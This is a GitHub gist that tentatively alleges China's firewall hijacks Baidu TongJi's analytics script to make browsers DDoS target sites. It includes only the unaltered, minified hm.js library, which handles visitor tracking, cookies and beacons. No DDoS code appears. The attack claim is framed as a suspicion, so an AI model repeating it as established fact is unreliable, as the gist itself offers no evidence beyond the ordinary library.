Skip to content

Instantly share code, notes, and snippets.

@williamli

williamli/Baidu TongJi + China Firewall = DDOS "Great Cannon"

Last active June 20, 2023 22:01
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save williamli/223033fd95179d966fd2b4ce4543cfbb to your computer and use it in GitHub Desktop.
Save williamli/223033fd95179d966fd2b4ce4543cfbb to your computer and use it in GitHub Desktop.
Download ZIP
Baidu TongJi's Javascript Library (//hm.baidu.com/hm.js) Changes (by Firewall of China) to launch DDOS attack on enemy websites?
Raw
Baidu TongJi + China Firewall = DDOS "Great Cannon"
The Great Firewall of China seems to be hijacking Baidu Analytics (TongJi)'s Javascript code,
launching DDOS attacks on enemy websites from browsers.
Different hm.js (TongJi library) libraries are spotted and load interchangably.
An altered hm.js code is used when DDOS is observed.
More Info: https://stackoverflow.com/questions/45874555/baidu-tongji-analytics-is-directing-browsers-to-ddos-chinas-enemies
Raw
hm.js (original - no DDOS spotted)
(function() {
var h = {}
, mt = {}
, c = {
id: "#######",
dm: ["#########.codes"],
js: "tongji.baidu.com/hm-web/js/",
etrk: [],
icon: '',
ctrk: false,
align: -1,
nv: -1,
vdur: 1800000,
age: 31536000000,
rec: 0,
rp: [],
trust: 0,
vcard: 0,
qiao: 0,
lxb: 0,
conv: 0,
med: 0,
cvcc: '',
cvcf: [],
apps: ''
};
var q = void 0
, r = !0
, s = null
, u = !1;
mt.i = {};
mt.i.za = /msie (\d+\.\d+)/i.test(navigator.userAgent);
mt.i.xa = /msie (\d+\.\d+)/i.test(navigator.userAgent) ? document.documentMode || +RegExp.$1 : q;
mt.i.cookieEnabled = navigator.cookieEnabled;
mt.i.javaEnabled = navigator.javaEnabled();
mt.i.language = navigator.language || navigator.browserLanguage || navigator.systemLanguage || navigator.userLanguage || "";
mt.i.Ba = (window.screen.width || 0) + "x" + (window.screen.height || 0);
mt.i.colorDepth = window.screen.colorDepth || 0;
mt.cookie = {};
mt.cookie.set = function(a, d, e) {
var f;
e.G && (f = new Date,
f.setTime(f.getTime() + e.G));
document.cookie = a + "=" + d + (e.domain ? "; domain=" + e.domain : "") + (e.path ? "; path=" + e.path : "") + (f ? "; expires=" + f.toGMTString() : "") + (e.Za ? "; secure" : "")
}
;
mt.cookie.get = function(a) {
return (a = RegExp("(^| )" + a + "=([^;]*)(;|$)").exec(document.cookie)) ? a[2] : s
}
;
mt.p = {};
mt.p.la = function(a) {
return document.getElementById(a)
}
;
mt.p.Sa = function(a, d) {
for (d = d.toUpperCase(); (a = a.parentNode) && 1 == a.nodeType; )
if (a.tagName == d)
return a;
return s
}
;
(mt.p.X = function() {
function a() {
if (!a.z) {
a.z = r;
for (var d = 0, e = f.length; d < e; d++)
f[d]()
}
}
function d() {
try {
document.documentElement.doScroll("left")
} catch (f) {
setTimeout(d, 1);
return
}
a()
}
var e = u, f = [], k;
document.addEventListener ? k = function() {
document.removeEventListener("DOMContentLoaded", k, u);
a()
}
: document.attachEvent && (k = function() {
"complete" === document.readyState && (document.detachEvent("onreadystatechange", k),
a())
}
);
(function() {
if (!e)
if (e = r,
"complete" === document.readyState)
a.z = r;
else if (document.addEventListener)
document.addEventListener("DOMContentLoaded", k, u),
window.addEventListener("load", a, u);
else if (document.attachEvent) {
document.attachEvent("onreadystatechange", k);
window.attachEvent("onload", a);
var f = u;
try {
f = window.frameElement == s
} catch (n) {}
document.documentElement.doScroll && f && d()
}
}
)();
return function(d) {
a.z ? d() : f.push(d)
}
}()).z = u;
mt.event = {};
mt.event.c = function(a, d, e) {
a.attachEvent ? a.attachEvent("on" + d, function(d) {
e.call(a, d)
}) : a.addEventListener && a.addEventListener(d, e, u)
}
;
mt.event.preventDefault = function(a) {
a.preventDefault ? a.preventDefault() : a.returnValue = u
}
;
mt.j = {};
mt.j.parse = function() {
return (new Function('return (" + source + ")'))()
}
;
mt.j.stringify = function() {
function a(a) {
/["\\\x00-\x1f]/.test(a) && (a = a.replace(/["\\\x00-\x1f]/g, function(a) {
var d = e[a];
if (d)
return d;
d = a.charCodeAt();
return "\\u00" + Math.floor(d / 16).toString(16) + (d % 16).toString(16)
}));
return '"' + a + '"'
}
function d(a) {
return 10 > a ? "0" + a : a
}
var e = {
"\b": "\\b",
"\t": "\\t",
"\n": "\\n",
"\f": "\\f",
"\r": "\\r",
'"': '\\"',
"\\": "\\\\"
};
return function(f) {
switch (typeof f) {
case "undefined":
return "undefined";
case "number":
return isFinite(f) ? String(f) : "null";
case "string":
return a(f);
case "boolean":
return String(f);
default:
if (f === s)
return "null";
if (f instanceof Array) {
var e = ["["], m = f.length, n, p, g;
for (p = 0; p < m; p++)
switch (g = f[p],
typeof g) {
case "undefined":
case "function":
case "unknown":
break;
default:
n && e.push(","),
e.push(mt.j.stringify(g)),
n = 1
}
e.push("]");
return e.join("")
}
if (f instanceof Date)
return '"' + f.getFullYear() + "-" + d(f.getMonth() + 1) + "-" + d(f.getDate()) + "T" + d(f.getHours()) + ":" + d(f.getMinutes()) + ":" + d(f.getSeconds()) + '"';
n = ["{"];
p = mt.j.stringify;
for (m in f)
if (Object.prototype.hasOwnProperty.call(f, m))
switch (g = f[m],
typeof g) {
case "undefined":
case "unknown":
case "function":
break;
default:
e && n.push(","),
e = 1,
n.push(p(m) + ":" + p(g))
}
n.push("}");
return n.join("")
}
}
}();
mt.lang = {};
mt.lang.d = function(a, d) {
return "[object " + d + "]" === {}.toString.call(a)
}
;
mt.lang.Wa = function(a) {
return mt.lang.d(a, "Number") && isFinite(a)
}
;
mt.lang.Ya = function(a) {
return mt.lang.d(a, "String")
}
;
mt.localStorage = {};
mt.localStorage.B = function() {
if (!mt.localStorage.g)
try {
mt.localStorage.g = document.createElement("input"),
mt.localStorage.g.type = "hidden",
mt.localStorage.g.style.display = "none",
mt.localStorage.g.addBehavior("#default#userData"),
document.getElementsByTagName("head")[0].appendChild(mt.localStorage.g)
} catch (a) {
return u
}
return r
}
;
mt.localStorage.set = function(a, d, e) {
var f = new Date;
f.setTime(f.getTime() + e || 31536E6);
try {
window.localStorage ? (d = f.getTime() + "|" + d,
window.localStorage.setItem(a, d)) : mt.localStorage.B() && (mt.localStorage.g.expires = f.toUTCString(),
mt.localStorage.g.load(document.location.hostname),
mt.localStorage.g.setAttribute(a, d),
mt.localStorage.g.save(document.location.hostname))
} catch (k) {}
}
;
mt.localStorage.get = function(a) {
if (window.localStorage) {
if (a = window.localStorage.getItem(a)) {
var d = a.indexOf("|")
, e = a.substring(0, d) - 0;
if (e && e > (new Date).getTime())
return a.substring(d + 1)
}
} else if (mt.localStorage.B())
try {
return mt.localStorage.g.load(document.location.hostname),
mt.localStorage.g.getAttribute(a)
} catch (f) {}
return s
}
;
mt.localStorage.remove = function(a) {
if (window.localStorage)
window.localStorage.removeItem(a);
else if (mt.localStorage.B())
try {
mt.localStorage.g.load(document.location.hostname),
mt.localStorage.g.removeAttribute(a),
mt.localStorage.g.save(document.location.hostname)
} catch (d) {}
}
;
mt.sessionStorage = {};
mt.sessionStorage.set = function(a, d) {
if (window.sessionStorage)
try {
window.sessionStorage.setItem(a, d)
} catch (e) {}
}
;
mt.sessionStorage.get = function(a) {
return window.sessionStorage ? window.sessionStorage.getItem(a) : s
}
;
mt.sessionStorage.remove = function(a) {
window.sessionStorage && window.sessionStorage.removeItem(a)
}
;
mt.Y = {};
mt.Y.log = function(a, d) {
var e = new Image
, f = "mini_tangram_log_" + Math.floor(2147483648 * Math.random()).toString(36);
window[f] = e;
e.onload = e.onerror = e.onabort = function() {
e.onload = e.onerror = e.onabort = s;
e = window[f] = s;
d && d(a)
}
;
e.src = a
}
;
mt.O = {};
mt.O.qa = function() {
var a = "";
if (navigator.plugins && navigator.mimeTypes.length) {
var d = navigator.plugins["Shockwave Flash"];
d && d.description && (a = d.description.replace(/^.*\s+(\S+)\s+\S+$/, "$1"))
} else if (window.ActiveXObject)
try {
if (d = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"))
(a = d.GetVariable("$version")) && (a = a.replace(/^.*\s+(\d+),(\d+).*$/, "$1.$2"))
} catch (e) {}
return a
}
;
mt.O.Ra = function(a, d, e, f, k) {
return '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="' + a + '" width="' + e + '" height="' + f + '"><param name="movie" value="' + d + '" /><param name="flashvars" value="' + (k || "") + '" /><param name="allowscriptaccess" value="always" /><embed type="application/x-shockwave-flash" name="' + a + '" width="' + e + '" height="' + f + '" src="' + d + '" flashvars="' + (k || "") + '" allowscriptaccess="always" /></object>'
}
;
mt.url = {};
mt.url.f = function(a, d) {
var e = a.match(RegExp("(^|&|\\?|#)(" + d + ")=([^&#]*)(&|$|#)", ""));
return e ? e[3] : s
}
;
mt.url.Ua = function(a) {
return (a = a.match(/^(https?:)\/\//)) ? a[1] : s
}
;
mt.url.na = function(a) {
return (a = a.match(/^(https?:\/\/)?([^\/\?#]*)/)) ? a[2].replace(/.*@/, "") : s
}
;
mt.url.S = function(a) {
return (a = mt.url.na(a)) ? a.replace(/:\d+$/, "") : a
}
;
mt.url.Ta = function(a) {
return (a = a.match(/^(https?:\/\/)?[^\/]*(.*)/)) ? a[2].replace(/[\?#].*/, "").replace(/^$/, "/") : s
}
;
(function() {
function a() {
for (var a = u, e = document.getElementsByTagName("script"), f = e.length, f = 100 < f ? 100 : f, k = 0; k < f; k++) {
var m = e[k].src;
if (m && 0 === m.indexOf("https://hm.baidu.com/h")) {
a = r;
break
}
}
return a
}
return h.ka = a
}
)();
var A = h.ka;
h.C = {
Va: "http://tongji.baidu.com/hm-web/welcome/ico",
W: "hm.baidu.com/hm.gif",
ba: "baidu.com",
ua: "hmmd",
va: "hmpl",
Ka: "utm_medium",
ta: "hmkw",
Ma: "utm_term",
ra: "hmci",
Ja: "utm_content",
wa: "hmsr",
La: "utm_source",
sa: "hmcu",
Ia: "utm_campaign",
o: 0,
k: Math.round(+new Date / 1E3),
Q: Math.round(+new Date / 1E3) % 65535,
protocol: "https:" === document.location.protocol ? "https:" : "http:",
K: A() || "https:" === document.location.protocol ? "https:" : "http:",
Xa: 0,
Oa: 6E5,
Pa: 10,
Qa: 1024,
Na: 1,
L: 2147483647,
Z: "cc cf ci ck cl cm cp cu cw ds ep et fl ja ln lo lt nv rnd si st su v cv lv api sn ct u tt".split(" ")
};
(function() {
var a = {
m: {},
c: function(a, e) {
this.m[a] = this.m[a] || [];
this.m[a].push(e)
},
s: function(a, e) {
this.m[a] = this.m[a] || [];
for (var f = this.m[a].length, k = 0; k < f; k++)
this.m[a][k](e)
}
};
return h.F = a
}
)();
(function() {
function a(a, f) {
var k = document.createElement("script");
k.charset = "utf-8";
d.d(f, "Function") && (k.readyState ? k.onreadystatechange = function() {
if ("loaded" === k.readyState || "complete" === k.readyState)
k.onreadystatechange = s,
f()
}
: k.onload = function() {
f()
}
);
k.src = a;
var m = document.getElementsByTagName("script")[0];
m.parentNode.insertBefore(k, m)
}
var d = mt.lang;
return h.load = a
}
)();
(function() {
function a() {
return function() {
h.b.a.nv = 0;
h.b.a.st = 4;
h.b.a.et = 3;
h.b.a.ep = h.D.oa() + "," + h.D.ma();
h.b.h()
}
}
function d() {
clearTimeout(z);
var a;
x && (a = "visible" == document[x]);
y && (a = !document[y]);
p = "undefined" == typeof a ? r : a;
if ((!n || !g) && p && b)
v = r,
l = +new Date;
else if (n && g && (!p || !b))
v = u,
t += +new Date - l;
n = p;
g = b;
z = setTimeout(d, 100)
}
function e(b) {
var a = document
, l = "";
if (b in a)
l = b;
else
for (var t = ["webkit", "ms", "moz", "o"], d = 0; d < t.length; d++) {
var f = t[d] + b.charAt(0).toUpperCase() + b.slice(1);
if (f in a) {
l = f;
break
}
}
return l
}
function f(a) {
if (!("focus" == a.type || "blur" == a.type) || !(a.target && a.target != window))
b = "focus" == a.type || "focusin" == a.type ? r : u,
d()
}
var k = mt.event, m = h.F, n = r, p = r, g = r, b = r, w = +new Date, l = w, t = 0, v = r, x = e("visibilityState"), y = e("hidden"), z;
d();
(function() {
var b = x.replace(/[vV]isibilityState/, "visibilitychange");
k.c(document, b, d);
k.c(window, "pageshow", d);
k.c(window, "pagehide", d);
"object" == typeof document.onfocusin ? (k.c(document, "focusin", f),
k.c(document, "focusout", f)) : (k.c(window, "focus", f),
k.c(window, "blur", f))
}
)();
h.D = {
oa: function() {
return +new Date - w
},
ma: function() {
return v ? +new Date - l + t : t
}
};
m.c("pv-b", function() {
k.c(window, "unload", a())
});
return h.D
}
)();
(function() {
var a = mt.lang
, d = h.C
, e = h.load
, f = {
ya: function(f) {
if ((window._dxt === q || a.d(window._dxt, "Array")) && "undefined" !== typeof h.b) {
var m = h.b.H();
e([d.protocol, "//datax.baidu.com/x.js?si=", c.id, "&dm=", encodeURIComponent(m)].join(""), f)
}
},
Ha: function(d) {
if (a.d(d, "String") || a.d(d, "Number"))
window._dxt = window._dxt || [],
window._dxt.push(["_setUserId", d])
}
};
return h.ea = f
}
)();
(function() {
function a(b, a, l, t) {
if (!(b === q || a === q || t === q)) {
if ("" === b)
return [a, l, t].join("*");
b = String(b).split("!");
for (var d, f = u, e = 0; e < b.length; e++)
if (d = b[e].split("*"),
String(a) === d[0]) {
d[1] = l;
d[2] = t;
b[e] = d.join("*");
f = r;
break
}
f || b.push([a, l, t].join("*"));
return b.join("!")
}
}
function d(b) {
for (var a in b)
if ({}.hasOwnProperty.call(b, a)) {
var l = b[a];
f.d(l, "Object") || f.d(l, "Array") ? d(l) : b[a] = String(l)
}
}
function e(b) {
return b.replace ? b.replace(/'/g, "'0").replace(/\*/g, "'1").replace(/!/g, "'2") : b
}
var f = mt.lang
, k = mt.j
, m = h.C
, n = h.F
, p = h.ea
, g = {
r: [],
A: 0,
U: u,
l: {
P: "",
page: ""
},
init: function() {
g.e = 0;
n.c("pv-b", function() {
g.fa();
g.ha()
});
n.c("pv-d", function() {
g.ia();
g.l.page = ""
});
n.c("stag-b", function() {
h.b.a.api = g.e || g.A ? g.e + "_" + g.A : "";
h.b.a.ct = [decodeURIComponent(h.b.getData("Hm_ct_" + c.id) || ""), g.l.P, g.l.page].join("!")
});
n.c("stag-d", function() {
h.b.a.api = 0;
g.e = 0;
g.A = 0
})
},
fa: function() {
var b = window._hmt || [];
if (!b || f.d(b, "Array"))
window._hmt = {
id: c.id,
cmd: {},
push: function() {
for (var b = window._hmt, a = 0; a < arguments.length; a++) {
var d = arguments[a];
f.d(d, "Array") && (b.cmd[b.id].push(d),
"_setAccount" === d[0] && (1 < d.length && /^[0-9a-f]{32}$/.test(d[1])) && (d = d[1],
b.id = d,
b.cmd[d] = b.cmd[d] || []))
}
}
},
window._hmt.cmd[c.id] = [],
window._hmt.push.apply(window._hmt, b)
},
ha: function() {
var b = window._hmt;
if (b && b.cmd && b.cmd[c.id])
for (var a = b.cmd[c.id], l = /^_track(Event|MobConv|Order|RTEvent)$/, d = 0, f = a.length; d < f; d++) {
var e = a[d];
l.test(e[0]) ? g.r.push(e) : g.M(e)
}
b.cmd[c.id] = {
push: g.M
}
},
ia: function() {
if (0 < g.r.length)
for (var b = 0, a = g.r.length; b < a; b++)
g.M(g.r[b]);
g.r = s
},
M: function(b) {
var a = b[0];
if (g.hasOwnProperty(a) && f.d(g[a], "Function"))
g[a](b)
},
_setAccount: function(b) {
1 < b.length && /^[0-9a-f]{32}$/.test(b[1]) && (g.e |= 1)
},
_setAutoPageview: function(b) {
if (1 < b.length && (b = b[1],
u === b || r === b))
g.e |= 2,
h.b.T = b
},
_trackPageview: function(b) {
if (1 < b.length && b[1].charAt && "/" === b[1].charAt(0)) {
g.e |= 4;
h.b.a.et = 0;
h.b.a.ep = "";
h.b.I ? (h.b.a.nv = 0,
h.b.a.st = 4) : h.b.I = r;
var a = h.b.a.u
, l = h.b.a.su;
h.b.a.u = m.protocol + "//" + document.location.host + b[1];
g.U || (h.b.a.su = document.location.href);
h.b.h();
h.b.a.u = a;
h.b.a.su = l
}
},
_trackEvent: function(b) {
2 < b.length && (g.e |= 8,
h.b.a.nv = 0,
h.b.a.st = 4,
h.b.a.et = 4,
h.b.a.ep = e(b[1]) + "*" + e(b[2]) + (b[3] ? "*" + e(b[3]) : "") + (b[4] ? "*" + e(b[4]) : ""),
h.b.h())
},
_setCustomVar: function(b) {
if (!(4 > b.length)) {
var a = b[1]
, l = b[4] || 3;
if (0 < a && 6 > a && 0 < l && 4 > l) {
g.A++;
for (var d = (h.b.a.cv || "*").split("!"), f = d.length; f < a - 1; f++)
d.push("*");
d[a - 1] = l + "*" + e(b[2]) + "*" + e(b[3]);
h.b.a.cv = d.join("!");
b = h.b.a.cv.replace(/[^1](\*[^!]*){2}/g, "*").replace(/((^|!)\*)+$/g, "");
"" !== b ? h.b.setData("Hm_cv_" + c.id, encodeURIComponent(b), c.age) : h.b.Aa("Hm_cv_" + c.id)
}
}
},
_setUserTag: function(b) {
if (!(3 > b.length)) {
var d = e(b[1]);
b = e(b[2]);
if (d !== q && b !== q) {
var l = decodeURIComponent(h.b.getData("Hm_ct_" + c.id) || "")
, l = a(l, d, 1, b);
h.b.setData("Hm_ct_" + c.id, encodeURIComponent(l), c.age)
}
}
},
_setVisitTag: function(b) {
if (!(3 > b.length)) {
var d = e(b[1]);
b = e(b[2]);
if (d !== q && b !== q) {
var l = g.l.P
, l = a(l, d, 2, b);
g.l.P = l
}
}
},
_setPageTag: function(b) {
if (!(3 > b.length)) {
var d = e(b[1]);
b = e(b[2]);
if (d !== q && b !== q) {
var l = g.l.page
, l = a(l, d, 3, b);
g.l.page = l
}
}
},
_setReferrerOverride: function(b) {
1 < b.length && (h.b.a.su = b[1].charAt && "/" === b[1].charAt(0) ? m.protocol + "//" + window.location.host + b[1] : b[1],
g.U = r)
},
_trackOrder: function(b) {
b = b[1];
f.d(b, "Object") && (d(b),
g.e |= 16,
h.b.a.nv = 0,
h.b.a.st = 4,
h.b.a.et = 94,
h.b.a.ep = k.stringify(b),
h.b.h())
},
_trackMobConv: function(b) {
if (b = {
webim: 1,
tel: 2,
map: 3,
sms: 4,
callback: 5,
share: 6
}[b[1]])
g.e |= 32,
h.b.a.et = 93,
h.b.a.ep = b,
h.b.h()
},
_trackRTPageview: function(b) {
b = b[1];
f.d(b, "Object") && (d(b),
b = k.stringify(b),
512 >= encodeURIComponent(b).length && (g.e |= 64,
h.b.a.rt = b))
},
_trackRTEvent: function(b) {
b = b[1];
if (f.d(b, "Object")) {
d(b);
b = encodeURIComponent(k.stringify(b));
var a = function(b) {
var a = h.b.a.rt;
g.e |= 128;
h.b.a.et = 90;
h.b.a.rt = b;
h.b.h();
h.b.a.rt = a
}
, l = b.length;
if (900 >= l)
a.call(this, b);
else
for (var l = Math.ceil(l / 900), e = "block|" + Math.round(Math.random() * m.L).toString(16) + "|" + l + "|", v = [], x = 0; x < l; x++)
v.push(x),
v.push(b.substring(900 * x, 900 * x + 900)),
a.call(this, e + v.join("|")),
v = []
}
},
_setUserId: function(b) {
b = b[1];
p.ya();
p.Ha(b)
}
};
g.init();
h.ca = g;
return h.ca
}
)();
(function() {
function a() {
"undefined" === typeof window["_bdhm_loaded_" + c.id] && (window["_bdhm_loaded_" + c.id] = r,
this.a = {},
this.T = r,
this.I = u,
this.init())
}
var d = mt.url
, e = mt.Y
, f = mt.O
, k = mt.lang
, m = mt.cookie
, n = mt.i
, p = mt.localStorage
, g = mt.sessionStorage
, b = h.C
, w = h.F;
a.prototype = {
J: function(b, a) {
b = "." + b.replace(/:\d+/, "");
a = "." + a.replace(/:\d+/, "");
var d = b.indexOf(a);
return -1 < d && d + a.length === b.length
},
V: function(b, a) {
b = b.replace(/^https?:\/\//, "");
return 0 === b.indexOf(a)
},
w: function(b) {
for (var a = 0; a < c.dm.length; a++)
if (-1 < c.dm[a].indexOf("/")) {
if (this.V(b, c.dm[a]))
return r
} else {
var f = d.S(b);
if (f && this.J(f, c.dm[a]))
return r
}
return u
},
H: function() {
for (var b = document.location.hostname, a = 0, d = c.dm.length; a < d; a++)
if (this.J(b, c.dm[a]))
return c.dm[a].replace(/(:\d+)?[\/\?#].*/, "");
return b
},
R: function() {
for (var b = 0, a = c.dm.length; b < a; b++) {
var d = c.dm[b];
if (-1 < d.indexOf("/") && this.V(document.location.href, d))
return d.replace(/^[^\/]+(\/.*)/, "$1") + "/"
}
return "/"
},
pa: function() {
if (!document.referrer)
return b.k - b.o > c.vdur ? 1 : 4;
var a = u;
this.w(document.referrer) && this.w(document.location.href) ? a = r : (a = d.S(document.referrer),
a = this.J(a || "", document.location.hostname));
return a ? b.k - b.o > c.vdur ? 1 : 4 : 3
},
getData: function(a) {
try {
return m.get(a) || g.get(a) || p.get(a)
} catch (b) {}
},
setData: function(a, b, d) {
try {
m.set(a, b, {
domain: this.H(),
path: this.R(),
G: d
}),
d ? p.set(a, b, d) : g.set(a, b)
} catch (f) {}
},
Aa: function(a) {
try {
m.set(a, "", {
domain: this.H(),
path: this.R(),
G: -1
}),
g.remove(a),
p.remove(a)
} catch (b) {}
},
Fa: function() {
var a, d, f, e, g;
b.o = this.getData("Hm_lpvt_" + c.id) || 0;
13 === b.o.length && (b.o = Math.round(b.o / 1E3));
d = this.pa();
a = 4 !== d ? 1 : 0;
if (f = this.getData("Hm_lvt_" + c.id)) {
e = f.split(",");
for (g = e.length - 1; 0 <= g; g--)
13 === e[g].length && (e[g] = "" + Math.round(e[g] / 1E3));
for (; 2592E3 < b.k - e[0]; )
e.shift();
g = 4 > e.length ? 2 : 3;
for (1 === a && e.push(b.k); 4 < e.length; )
e.shift();
f = e.join(",");
e = e[e.length - 1]
} else
f = b.k,
e = "",
g = 1;
this.setData("Hm_lvt_" + c.id, f, c.age);
this.setData("Hm_lpvt_" + c.id, b.k);
f = b.k === this.getData("Hm_lpvt_" + c.id) ? "1" : "0";
if (0 === c.nv && this.w(document.location.href) && ("" === document.referrer || this.w(document.referrer)))
a = 0,
d = 4;
this.a.nv = a;
this.a.st = d;
this.a.cc = f;
this.a.lt = e;
this.a.lv = g
},
Ea: function() {
for (var a = [], d = this.a.et, e = 0, f = b.Z.length; e < f; e++) {
var g = b.Z[e]
, k = this.a[g];
"undefined" !== typeof k && "" !== k && ("tt" !== g || "tt" === g && 0 === d) && ("ct" !== g || "ct" === g && 0 === d) && a.push(g + "=" + encodeURIComponent(k))
}
switch (d) {
case 0:
a.push("sn=" + b.Q);
this.a.rt && a.push("rt=" + encodeURIComponent(this.a.rt));
break;
case 3:
a.push("sn=" + b.Q);
break;
case 90:
this.a.rt && a.push("rt=" + this.a.rt)
}
return a.join("&")
},
Ga: function() {
this.Fa();
this.a.si = c.id;
this.a.su = document.referrer;
this.a.ds = n.Ba;
this.a.cl = n.colorDepth + "-bit";
this.a.ln = String(n.language).toLowerCase();
this.a.ja = n.javaEnabled ? 1 : 0;
this.a.ck = n.cookieEnabled ? 1 : 0;
this.a.lo = "number" === typeof _bdhm_top ? 1 : 0;
this.a.fl = f.qa();
this.a.v = "1.2.16";
this.a.cv = decodeURIComponent(this.getData("Hm_cv_" + c.id) || "");
this.a.tt = document.title || "";
var a = document.location.href;
this.a.cm = d.f(a, b.ua) || "";
this.a.cp = d.f(a, b.va) || d.f(a, b.Ka) || "";
this.a.cw = d.f(a, b.ta) || d.f(a, b.Ma) || "";
this.a.ci = d.f(a, b.ra) || d.f(a, b.Ja) || "";
this.a.cf = d.f(a, b.wa) || d.f(a, b.La) || "";
this.a.cu = d.f(a, b.sa) || d.f(a, b.Ia) || ""
},
init: function() {
try {
this.Ga(),
0 === this.a.nv ? this.Da() : this.N(".*"),
h.b = this,
this.da(),
w.s("pv-b"),
this.Ca()
} catch (a) {
var d = [];
d.push("si=" + c.id);
d.push("n=" + encodeURIComponent(a.name));
d.push("m=" + encodeURIComponent(a.message));
d.push("r=" + encodeURIComponent(document.referrer));
e.log(b.K + "//" + b.W + "?" + d.join("&"))
}
},
Ca: function() {
function a() {
w.s("pv-d")
}
this.T ? (this.I = r,
this.a.et = 0,
this.a.ep = "",
this.h(a)) : a()
},
h: function(a) {
var d = this;
d.a.rnd = Math.round(Math.random() * b.L);
w.s("stag-b");
var f = b.K + "//" + b.W + "?" + d.Ea();
w.s("stag-d");
d.aa(f);
e.log(f, function(b) {
d.N(b);
k.d(a, "Function") && a.call(d)
})
},
da: function() {
var a = document.location.hash.substring(1)
, e = RegExp(c.id)
, f = -1 < document.referrer.indexOf(b.ba)
, g = d.f(a, "jn")
, k = /^heatlink$|^select$/.test(g);
a && (e.test(a) && f && k) && (this.a.rnd = Math.round(Math.random() * b.L),
a = document.createElement("script"),
a.setAttribute("type", "text/javascript"),
a.setAttribute("charset", "utf-8"),
a.setAttribute("src", b.protocol + "//" + c.js + g + ".js?" + this.a.rnd),
g = document.getElementsByTagName("script")[0],
g.parentNode.insertBefore(a, g))
},
aa: function(a) {
var b = g.get("Hm_unsent_" + c.id) || ""
, d = this.a.u ? "" : "&u=" + encodeURIComponent(document.location.href)
, b = encodeURIComponent(a.replace(/^https?:\/\//, "") + d) + (b ? "," + b : "");
g.set("Hm_unsent_" + c.id, b)
},
N: function(a) {
var b = g.get("Hm_unsent_" + c.id) || "";
b && (a = encodeURIComponent(a.replace(/^https?:\/\//, "")),
a = RegExp(a.replace(/([\*\(\)])/g, "\\$1") + "(%26u%3D[^,]*)?,?", "g"),
(b = b.replace(a, "").replace(/,$/, "")) ? g.set("Hm_unsent_" + c.id, b) : g.remove("Hm_unsent_" + c.id))
},
Da: function() {
var a = this
, d = g.get("Hm_unsent_" + c.id);
if (d)
for (var d = d.split(","), f = function(d) {
e.log(b.K + "//" + decodeURIComponent(d), function(b) {
a.N(b)
})
}, k = 0, y = d.length; k < y; k++)
f(d[k])
}
};
return new a
}
)();
(function() {
var a = mt.p
, d = mt.event
, e = mt.url
, f = mt.j;
try {
if (window.performance && performance.timing && "undefined" !== typeof h.b) {
var k = +new Date
, m = function(a) {
var d = performance.timing
, e = d[a + "Start"] ? d[a + "Start"] : 0;
a = d[a + "End"] ? d[a + "End"] : 0;
return {
start: e,
end: a,
value: 0 < a - e ? a - e : 0
}
}
, n = s;
a.X(function() {
n = +new Date
});
var p = function() {
var a, d, g;
g = m("navigation");
d = m("request");
g = {
netAll: d.start - g.start,
netDns: m("domainLookup").value,
netTcp: m("connect").value,
srv: m("response").start - d.start,
dom: performance.timing.domInteractive - performance.timing.fetchStart,
loadEvent: m("loadEvent").end - g.start
};
a = document.referrer;
var p = a.match(/^(http[s]?:\/\/)?([^\/]+)(.*)/) || []
, v = s;
d = s;
if ("www.baidu.com" === p[2] || "m.baidu.com" === p[2])
v = e.f(a, "qid"),
d = e.f(a, "click_t");
a = v;
g.qid = a != s ? a : "";
d != s ? (g.bdDom = n ? n - d : 0,
g.bdRun = k - d,
g.bdDef = m("navigation").start - d) : (g.bdDom = 0,
g.bdRun = 0,
g.bdDef = 0);
h.b.a.et = 87;
h.b.a.ep = f.stringify(g);
h.b.h()
};
d.c(window, "load", function() {
setTimeout(p, 500)
})
}
} catch (g) {}
}
)();
(function() {
var a = mt.i
, d = mt.lang
, e = mt.event
, f = mt.j;
if ("undefined" !== typeof h.b && (c.med || (!a.za || 7 < a.xa) && c.cvcc)) {
var k, m, n, p, g = function(a) {
if (a.item) {
for (var b = a.length, d = Array(b); b--; )
d[b] = a[b];
return d
}
return [].slice.call(a)
}, b = function(a, b) {
for (var d in a)
if (a.hasOwnProperty(d) && b.call(a, d, a[d]) === u)
return u
}, w = function(a, b) {
var e = {};
e.n = k;
e.t = "clk";
e.v = a;
if (b) {
var g = b.getAttribute("href")
, l = b.getAttribute("onclick") ? "" + b.getAttribute("onclick") : s
, m = b.getAttribute("id") || "";
n.test(g) ? (e.sn = "mediate",
e.snv = g) : d.d(l, "String") && n.test(l) && (e.sn = "wrap",
e.snv = l);
e.id = m
}
h.b.a.et = 86;
h.b.a.ep = f.stringify(e);
h.b.h();
for (e = +new Date; 400 >= +new Date - e; )
;
};
if (c.med)
m = "/zoosnet",
k = "swt",
n = /swt|zixun|call|chat|zoos|business|talk|kefu|openkf|online|\/LR\/Chatpre\.aspx/i,
p = {
click: function() {
for (var a = [], b = g(document.getElementsByTagName("a")), b = [].concat.apply(b, g(document.getElementsByTagName("area"))), b = [].concat.apply(b, g(document.getElementsByTagName("img"))), d, e, f = 0, k = b.length; f < k; f++)
d = b[f],
e = d.getAttribute("onclick"),
d = d.getAttribute("href"),
(n.test(e) || n.test(d)) && a.push(b[f]);
return a
}
};
else if (c.cvcc) {
m = "/other-comm";
k = "other";
n = c.cvcc.q || q;
var l = c.cvcc.id || q;
p = {
click: function() {
for (var a = [], b = g(document.getElementsByTagName("a")), b = [].concat.apply(b, g(document.getElementsByTagName("area"))), b = [].concat.apply(b, g(document.getElementsByTagName("img"))), d, e, f, k = 0, m = b.length; k < m; k++)
d = b[k],
n !== q ? (e = d.getAttribute("onclick"),
f = d.getAttribute("href"),
l ? (d = d.getAttribute("id"),
(n.test(e) || n.test(f) || l.test(d)) && a.push(b[k])) : (n.test(e) || n.test(f)) && a.push(b[k])) : l !== q && (d = d.getAttribute("id"),
l.test(d) && a.push(b[k]));
return a
}
}
}
if ("undefined" !== typeof p && "undefined" !== typeof n) {
var t;
m += /\/$/.test(m) ? "" : "/";
var v = function(a, b) {
if (t === b)
return w(m + a, b),
u;
if (d.d(b, "Array") || d.d(b, "NodeList"))
for (var e = 0, f = b.length; e < f; e++)
if (t === b[e])
return w(m + a + "/" + (e + 1), b[e]),
u
};
e.c(document, "mousedown", function(a) {
a = a || window.event;
t = a.target || a.srcElement;
var e = {};
for (b(p, function(a, b) {
e[a] = d.d(b, "Function") ? b() : document.getElementById(b)
}); t && t !== document && b(e, v) !== u; )
t = t.parentNode
})
}
}
